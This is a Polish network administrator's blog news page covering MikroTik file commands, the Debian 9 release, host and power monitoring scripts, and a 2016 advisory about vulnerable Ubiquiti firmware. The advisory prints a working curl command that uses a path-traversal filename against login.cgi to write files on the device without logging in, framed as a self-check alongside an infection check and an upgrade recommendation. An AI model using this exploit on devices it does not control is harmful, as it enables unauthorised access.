Backup Network Devices        AlertHostsDown        Upgrade Network Devices        JPK i LMS        syncLMS-MikroTik-PPPoE       

strona główna

 

diagnostyka

 

mapy

 

Pogoda

 

Warte polecenia

 

News - operacje na plikach w Mikrotiku

   28-09-2017 23:18:00       Odwiedziny: 765

Tworzenie pliku z rozszerzeniem txt:
/file print file=plik

Zapisywanie danych do pliku:
/file set plik.txt contents="10"

Czytane z pliku:
:put [/file get plik.txt contents];

Zmiana nazwy pliku (należy mieć uruchomione ftp):
/tool fetch address=127.0.0.1 mode=ftp user=admin password=admin port=21 \
 src-path=plik.txt dst-path=kazuko.txt
Zobacz więcej...


News - Debian 9.0 Stretch has been released!

   18-06-2017 12:00:00       Odwiedziny: 177

Wydany!
Debian 9 Stretch został oficjalnie wydany w wersji stabilnej.

Powiększ (+)   Powiększ (+)   Powiększ (+)   Powiększ (+)   Powiększ (+)
Powiększ (+)   Powiększ (+)   Powiększ (+)   Powiększ (+)   Powiększ (+)
Powiększ (+)   Powiększ (+)

To wydanie zawiera liczne aktualizacje pakietów oprogramowania, takich jak:
  • Apache 2.4.25
  • Asterisk 13.14.1
  • Chromium 59.0.3071.86
  • Firefox 45.9 (w pakiecie firefox-esr)
  • GIMP 2.8.18
  • zaktualizowana wersja środowiska graficznego GNOME 3.22
  • GNU Compiler Collection 6.3
  • GnuPG 2.1
  • Golang 1.7
  • KDE Frameworks 5.28, KDE Plasma 5.8 i KDE Applications 16.08 oraz komponent PIM w wersji 16.04
  • LibreOffice 5.2
  • Linux 4.9
  • MariaDB 10.1
  • MATE 1.16
  • OpenJDK 8
  • Perl 5.24
  • PHP 7.0
  • PostgreSQL 9.6
  • Python 2.7.13 i 3.5.3
  • Ruby 2.3
  • Samba 4.5
  • systemd 232
  • Thunderbird 45.8
  • Tomcat 8.5
  • Xen Hypervisor
  • środowisko graficzne Xfce 4.12
  • ...
Zobacz więcej...


News - Wesołych

   20-12-2016 23:00:00       Odwiedziny: 202

Wesołych Świąt ! :-)


Zobacz więcej...


News - Aktualizacja - AlertHostsDown - test osiągalności hostów

   31-07-2016 14:30:00      30-10-2016 00:00:00       Odwiedziny: 1303

    Jest to skrypt sprawdzający czy działają hosty wykorzystując program ping oraz informującym odpowiednią osobę po przez email lub sms o stanie hostów.

FUNKCJE:
  • sprawdzanie czy hosty są osiąglne co 3 minuty z możliwością zmiany,
  • powiadomienia mail oraz/lub sms w postaci listy o zmianie stanu hostów (nie/odpowiada na X pingów),
  • sms po przez modem GSM, serwersms.pl lub sms2mail (np. smeskom.pl),
  • logi


Zobacz więcej...


News - Aktualizacja - AlertPowerMT - spadek napięcia

   12-02-2015 20:00:00      30-10-2016 00:00:00       Odwiedziny: 2745

    Jest to skrypt wykrywającym zmianę napięcia oraz informującym odpowiednią osobę po przez email lub sms.

FUNKCJE:
  • sprawdzanie napięcia co 30s z możliwością zmiany,
  • powiadomienia mail oraz/lub sms o przekroczeniu progu napięcia, czyli wykrycie braku napięcia z sieci,
  • sms po przez modem GSM, serwersms.pl lub sms2mail (np. smeskom.pl),
  • informacja o restarcie,
  • logi
Zobacz więcej...


News - backupList v4.3.1

   04-06-2016 20:10:59       Odwiedziny: 320

4.3.1.PL
03-06-2016
- WAŻNE !!!
od wersji 4.0.0 skrypt nie tworzył kopii zapasowej (*.backup) dla Mikrotika w wersji 6.12 i niższych
Zobacz więcej...


News - Dziurawe Ubiquiti do wersji 5.5.9 ! Zalecana aktualizacja do 5.6.X !

   15-05-2016 01:21:06       Odwiedziny: 1333



Jeśli jesteś szczęśliwym posiadaczem urządzenia ze stajni Ubiquiti to muszę Cie zasmucić. Wersje do 5.5.9 posiadają coś na kształt furtki przez którą można przecisnąć plik i dać dostęp dla nieupoważnionych osób niemających loginu i hasła. Wystarczy, że znany jest port http lub https dzięki któremu logujesz się na swoje urządzenie.
Sprawdź sam:
echo "kazuko"  /tmp/kazuko
curl -F "file=@/tmp/kazuko;filename=../../etc/dropbear/kazuko" -H "Expect:" 'http://1.1.1.1:80/login.cgi' -k
ssh -p 22 ubnt@1.1.1.1 "cat /etc/dropbear/kazuko"

Niestety już ktoś próbuje to wykorzystać i wrzuca wirusy.
Aby sprawdzić czy Twoje urządzenie zostało zawirusowane wykonaj to polecenie z linuxowego terminala:
ssh -p 22 ubnt@1.1.1.1 "ls -a /etc/persistent/ | grep mf"
Lub zaloguj się na urządzenie po ssh (putty) i wykonaj:
ls -a /etc/persistent/ | grep mf
...
Zobacz więcej...

 1 2 3 4 5 6 7 8 9 
Copyright seszu © 30.10.2010-2020.